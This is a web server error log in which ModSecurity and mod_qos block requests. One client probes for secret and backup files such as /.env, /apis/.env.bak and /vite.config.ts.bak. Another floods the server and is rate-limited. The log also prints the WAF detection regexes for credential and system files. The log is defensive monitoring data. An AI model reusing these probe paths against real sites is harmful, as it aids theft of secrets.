[Tue May 26 19:53:57.737665 2026] [security2:error] [pid 93868:tid 94301] [client 185.177.72.53:63430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/be/.env"] [unique_id "ahWs_UqK9k_ZUB2Vp25FYQAAAbo"]
[Tue May 26 19:53:57.739029 2026] [qos:error] [pid 93576:tid 93792] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_WDRMqfxdEDkoszMUAAAAFA
[Tue May 26 19:53:57.739840 2026] [qos:error] [pid 86490:tid 86665] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KyEAAAALI
[Tue May 26 19:53:57.741102 2026] [qos:error] [pid 86490:tid 86722] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KyEQAAAOs
[Tue May 26 19:53:57.743929 2026] [qos:error] [pid 86490:tid 86711] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KyEgAAAOA
[Tue May 26 19:53:57.744429 2026] [qos:error] [pid 93576:tid 93837] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_WDRMqfxdEDkoszMUQAAAH0
[Tue May 26 19:53:57.748868 2026] [qos:error] [pid 93576:tid 93735] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_WDRMqfxdEDkoszMUgAAABc
[Tue May 26 19:53:57.750686 2026] [qos:error] [pid 86490:tid 86630] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KyEwAAAI8
[Tue May 26 19:53:57.758241 2026] [qos:error] [pid 86490:tid 86732] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KyFAAAAPU
[Tue May 26 19:53:57.904757 2026] [security2:error] [pid 93868:tid 94312] [client 185.177.72.53:63430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/apis/.env.bak"] [unique_id "ahWs_UqK9k_ZUB2Vp25FZgAAAcU"]
[Tue May 26 19:53:57.962280 2026] [qos:error] [pid 86490:tid 86737] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KyFwAAAPo
[Tue May 26 19:53:57.968338 2026] [qos:error] [pid 86490:tid 86665] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KyGAAAALI
[Tue May 26 19:53:57.970058 2026] [qos:error] [pid 86490:tid 86711] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KyGgAAAOA
[Tue May 26 19:53:57.971691 2026] [qos:error] [pid 93576:tid 93738] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_WDRMqfxdEDkoszMUwAAABo
[Tue May 26 19:53:57.972548 2026] [qos:error] [pid 93576:tid 93774] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_WDRMqfxdEDkoszMVAAAAD4
[Tue May 26 19:53:57.975825 2026] [qos:error] [pid 93576:tid 93739] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_WDRMqfxdEDkoszMVQAAABs
[Tue May 26 19:53:57.975846 2026] [qos:error] [pid 86490:tid 86630] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KyGwAAAI8
[Tue May 26 19:53:57.976834 2026] [qos:error] [pid 93576:tid 93758] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_WDRMqfxdEDkoszMVgAAAC4
[Tue May 26 19:53:57.977202 2026] [qos:error] [pid 86490:tid 86732] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KyHAAAAPU
[Tue May 26 19:53:57.979605 2026] [qos:error] [pid 86490:tid 86660] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KyHQAAAK0
[Tue May 26 19:53:58.082486 2026] [autoindex:error] [pid 86490:tid 86646] [client 31.220.74.20:50697] AH01276: Cannot serve directory /home2/svijakqj/rbkgroups.co.in/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 19:53:58.159977 2026] [qos:error] [pid 86490:tid 86665] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KyJAAAALI
[Tue May 26 19:53:58.161016 2026] [qos:error] [pid 86490:tid 86711] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KyJQAAAOA
[Tue May 26 19:53:58.163018 2026] [qos:error] [pid 86490:tid 86630] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KyJgAAAI8
[Tue May 26 19:53:58.165298 2026] [qos:error] [pid 93576:tid 93808] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_mDRMqfxdEDkoszMWQAAAGA
[Tue May 26 19:53:58.165363 2026] [qos:error] [pid 93576:tid 93716] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs_mDRMqfxdEDkoszMWAAAAAQ
[Tue May 26 19:53:58.167991 2026] [qos:error] [pid 93576:tid 93764] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_mDRMqfxdEDkoszMWgAAADQ
[Tue May 26 19:53:58.171756 2026] [qos:error] [pid 86490:tid 86660] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KyKAAAAK0
[Tue May 26 19:53:58.172777 2026] [qos:error] [pid 86490:tid 86651] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KyKQAAAKQ
[Tue May 26 19:53:58.174747 2026] [qos:error] [pid 93576:tid 93796] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_mDRMqfxdEDkoszMWwAAAFQ
[Tue May 26 19:53:58.177020 2026] [qos:error] [pid 86490:tid 86697] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KyKgAAANI
[Tue May 26 19:53:58.278434 2026] [security2:error] [pid 93868:tid 94362] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_EqK9k_ZUB2Vp25FPgAAAfc"]
[Tue May 26 19:53:58.278461 2026] [security2:error] [pid 86490:tid 86728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_FZMwN0DpLVWo6KxegAAAPE"]
[Tue May 26 19:53:58.278590 2026] [security2:error] [pid 86490:tid 86641] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_FZMwN0DpLVWo6KxXQAAAJo"]
[Tue May 26 19:53:58.286016 2026] [security2:error] [pid 86490:tid 86624] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_FZMwN0DpLVWo6KxcAAAAIk"]
[Tue May 26 19:53:58.290083 2026] [security2:error] [pid 86490:tid 86710] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_FZMwN0DpLVWo6KxYwAAAN8"]
[Tue May 26 19:53:58.290244 2026] [security2:error] [pid 86490:tid 86668] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_FZMwN0DpLVWo6KxYQAAALU"]
[Tue May 26 19:53:58.292493 2026] [security2:error] [pid 93868:tid 94293] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_EqK9k_ZUB2Vp25FPwAAAbI"]
[Tue May 26 19:53:58.293498 2026] [security2:error] [pid 93867:tid 94114] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_JCDfrjqoHpuuBKsJgAAAUw"]
[Tue May 26 19:53:58.295320 2026] [security2:error] [pid 93868:tid 94333] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_EqK9k_ZUB2Vp25FQwAAAdo"]
[Tue May 26 19:53:58.302745 2026] [security2:error] [pid 86490:tid 86724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_FZMwN0DpLVWo6KxdQAAAO0"]
[Tue May 26 19:53:58.305648 2026] [security2:error] [pid 86490:tid 86744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_FZMwN0DpLVWo6KxbwAAAQE"]
[Tue May 26 19:53:58.322767 2026] [security2:error] [pid 86490:tid 86642] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_FZMwN0DpLVWo6KxgQAAAJs"]
[Tue May 26 19:53:58.326679 2026] [security2:error] [pid 93868:tid 94290] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_EqK9k_ZUB2Vp25FQQAAAa8"]
[Tue May 26 19:53:58.327510 2026] [security2:error] [pid 86490:tid 86742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_FZMwN0DpLVWo6KxdAAAAP8"]
[Tue May 26 19:53:58.328576 2026] [security2:error] [pid 93867:tid 94112] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_JCDfrjqoHpuuBKsKgAAAUs"]
[Tue May 26 19:53:58.330379 2026] [security2:error] [pid 86490:tid 86635] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_FZMwN0DpLVWo6KxfQAAAJQ"]
[Tue May 26 19:53:58.338338 2026] [security2:error] [pid 93868:tid 94347] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_EqK9k_ZUB2Vp25FRAAAAeg"]
[Tue May 26 19:53:58.346518 2026] [security2:error] [pid 86490:tid 86718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_FZMwN0DpLVWo6KxfwAAAOc"]
[Tue May 26 19:53:58.352009 2026] [security2:error] [pid 86490:tid 86707] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_FZMwN0DpLVWo6KxmwAAANw"]
[Tue May 26 19:53:58.366691 2026] [security2:error] [pid 93868:tid 94264] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_EqK9k_ZUB2Vp25FSQAAAZU"]
[Tue May 26 19:53:58.373113 2026] [security2:error] [pid 93867:tid 94021] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_JCDfrjqoHpuuBKsJwAAARE"]
[Tue May 26 19:53:58.382097 2026] [security2:error] [pid 86490:tid 86694] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_FZMwN0DpLVWo6KxmQAAAM8"]
[Tue May 26 19:53:58.389304 2026] [security2:error] [pid 93868:tid 94379] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_UqK9k_ZUB2Vp25FVAAAAgg"]
[Tue May 26 19:53:58.396610 2026] [security2:error] [pid 93868:tid 94297] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_UqK9k_ZUB2Vp25FWAAAAbY"]
[Tue May 26 19:53:58.396998 2026] [security2:error] [pid 86490:tid 86648] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_VZMwN0DpLVWo6KxzgAAAKE"]
[Tue May 26 19:53:58.398307 2026] [security2:error] [pid 86490:tid 86709] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_VZMwN0DpLVWo6Kx7AAAAN4"]
[Tue May 26 19:53:58.402778 2026] [security2:error] [pid 86490:tid 86740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_FZMwN0DpLVWo6KxmgAAAP0"]
[Tue May 26 19:53:58.405035 2026] [security2:error] [pid 86490:tid 86723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_VZMwN0DpLVWo6Kx6QAAAOw"]
[Tue May 26 19:53:58.406305 2026] [security2:error] [pid 93867:tid 94206] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_ZCDfrjqoHpuuBKsNAAAAXU"]
[Tue May 26 19:53:58.423295 2026] [security2:error] [pid 86490:tid 86739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_VZMwN0DpLVWo6Kx5gAAAPw"]
[Tue May 26 19:53:58.427030 2026] [security2:error] [pid 86490:tid 86699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_VZMwN0DpLVWo6Kx7gAAANQ"]
[Tue May 26 19:53:58.430066 2026] [security2:error] [pid 86490:tid 86653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_VZMwN0DpLVWo6KxzwAAAKY"]
[Tue May 26 19:53:58.435041 2026] [security2:error] [pid 86490:tid 86627] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_VZMwN0DpLVWo6Kx0AAAAIw"]
[Tue May 26 19:53:58.438181 2026] [security2:error] [pid 93868:tid 94326] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_UqK9k_ZUB2Vp25FVwAAAdM"]
[Tue May 26 19:53:58.439260 2026] [security2:error] [pid 86490:tid 86716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_VZMwN0DpLVWo6Kx7wAAAOU"]
[Tue May 26 19:53:58.441025 2026] [security2:error] [pid 93868:tid 94308] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_UqK9k_ZUB2Vp25FVgAAAcE"]
[Tue May 26 19:53:58.444048 2026] [security2:error] [pid 86490:tid 86703] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_VZMwN0DpLVWo6Kx6gAAANg"]
[Tue May 26 19:53:58.451187 2026] [security2:error] [pid 86490:tid 86640] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_VZMwN0DpLVWo6Kx7QAAAJk"]
[Tue May 26 19:53:58.452230 2026] [security2:error] [pid 86490:tid 86678] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_VZMwN0DpLVWo6Kx5AAAAL8"]
[Tue May 26 19:53:58.581087 2026] [security2:error] [pid 93868:tid 94259] [client 185.177.72.53:63430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/nuxt-app/frontend/.env"] [unique_id "ahWs_kqK9k_ZUB2Vp25FbQAAAZA"]
[Tue May 26 19:53:58.633675 2026] [qos:error] [pid 93868:tid 94325] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs_kqK9k_ZUB2Vp25FdgAAAdI
[Tue May 26 19:53:58.633861 2026] [qos:error] [pid 86490:tid 86637] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KyXAAAAJY
[Tue May 26 19:53:58.634142 2026] [qos:error] [pid 86490:tid 86705] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KyWgAAANo
[Tue May 26 19:53:58.634427 2026] [qos:error] [pid 86490:tid 86711] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KyWwAAAOA
[Tue May 26 19:53:58.637687 2026] [qos:error] [pid 93867:tid 94031] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs_pCDfrjqoHpuuBKsYAAAARs
[Tue May 26 19:53:58.637730 2026] [qos:error] [pid 93867:tid 94044] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWs_pCDfrjqoHpuuBKsXwAAASg
[Tue May 26 19:53:58.637857 2026] [qos:error] [pid 93867:tid 94154] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWs_pCDfrjqoHpuuBKsYQAAAV4
[Tue May 26 19:53:58.637903 2026] [qos:error] [pid 93867:tid 94216] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=103, c=50.87.254.159, id=ahWs_pCDfrjqoHpuuBKsYwAAAXo
[Tue May 26 19:53:58.638395 2026] [qos:error] [pid 86490:tid 86699] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs_lZMwN0DpLVWo6KyXQAAANQ
[Tue May 26 19:53:58.643791 2026] [qos:error] [pid 93867:tid 94140] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs_pCDfrjqoHpuuBKsZwAAAVg
[Tue May 26 19:53:58.750160 2026] [security2:error] [pid 93868:tid 94370] [client 185.177.72.53:63430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/vite.config.ts.bak"] [unique_id "ahWs_kqK9k_ZUB2Vp25FeQAAAf8"]
[Tue May 26 19:53:58.785418 2026] [qos:error] [pid 93576:tid 93816] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_mDRMqfxdEDkoszMgAAAAGg
